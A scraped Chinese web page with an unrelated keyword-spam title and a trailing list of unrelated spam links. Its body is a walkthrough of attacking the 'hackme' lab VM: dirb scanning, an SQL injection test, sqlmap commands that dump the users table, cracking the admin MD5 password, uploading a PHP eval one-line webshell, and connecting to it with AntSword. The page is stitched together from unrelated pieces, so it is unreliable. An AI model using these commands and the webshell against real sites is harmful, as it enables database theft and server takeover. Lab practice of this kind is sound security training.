当前位置: 首页 > news >正文

专业的网站建设收费标准网站建设 部署与发布试题

news 2025/10/31 0:37:04
专业的网站建设收费标准,网站建设 部署与发布试题,泰安网站开发制作公司,宁夏网站建设费用地址1.打开kali虚拟机和hackme靶机,都用nat模式连接 2.用kali扫描hackme靶机的ip 3.外部浏览器访问靶机IP 4.运用kali dirb命令扫描敏感文件 5.注册用户,登录 6.进入首页,发现是一个查询页面,可能存在sql注入 7.判断是否存在sql注入 …

1.打开kali虚拟机和hackme靶机,都用nat模式连接

2.用kali扫描hackme靶机的ip

3.外部浏览器访问靶机IP

4.运用kali dirb命令扫描敏感文件

5.注册用户,登录

6.进入首页,发现是一个查询页面,可能存在sql注入

7.判断是否存在sql注入

windows

windows' and 1=2#

8.bp抓搜索的包

将抓到的包保存成一个文件,在windows后面加一个*,说明这里是注入点

9.kali中使用sqlmap工具

爆破库名

sqlmap -r '1.txt' --current-db


爆破表名

sqlmap -r '1.txt' -D webapphacking --tables


打印‘users’表

sqlmap -r '1.txt' -D webapphacking -T users --dump

                         

发现有一个超级管理员用户,密码md5解密

10.登录超级管理员用户,发现文件上传

11.上传一句话木马

<?php @eval($_POST['cmd']);?>

12.访问uploads目录下,发现上传的木马

13.蚁剑连接

http://www.dtcms.com/a/547730.html

相关文章:

  • 网站备案负责人照片浏览器网页截图快捷键
  • 广州中新知识城开发建设网站有声阅读网站如何建设
  • 做后期的网站宁波网站设计企业
  • 昌平企业网站建设公司做的网站入哪个会计科目
  • 网站优化用户体验wordpress 数据库建立
  • 网站按域名跳转不同的页面方城网站制作
  • 多个域名绑定同一网站吗北京微信网站制作电话
  • 网站建设思路及设计方案淄博网站制作高端服务
  • 免费建个人网站步骤发布网站需要备案吗
  • 禹城网站建设公司推广网站模板
  • 百度安全网站检测智慧团建网登录入口
  • 网站建设 贴吧windows优化大师在哪里
  • 建设银行个人登录网站wordpress 注册页面
  • 青海城乡和住房建设厅网站网站建设软硬件平台有哪些
  • 向国外支付网站开发费网站建设 化工
  • 邯郸网站设计怎么用怎么制做网站
  • 中国建设银行河北省门户网站个人网页代码模板
  • 网站规划设计的步骤wordpress lights
  • 厦门网站建设阿里wordpress高仿dz模板
  • 收录好的网站有哪些一个备案可以做几个网站吗
  • 龙岩有什么招聘本地网站中国制造网一级类目
  • 建易网官网温州优化售后
  • 织梦html网站地图网站上那些兼职网页怎么做的
  • 微商城 网站制作如何查网站服务器速度
  • php mysql网站开发书国外视频模板网站e
  • 聊城宏远网站建设优化crm客户关系管理平台
  • 外贸自建站平台哪个好一个人如何注册公司
  • 建站平台步骤详解微网站和手机站区别
  • 做网站这么便宜可以吗建立外贸网站
  • php小说采集网站源码微信菜单怎么做微网站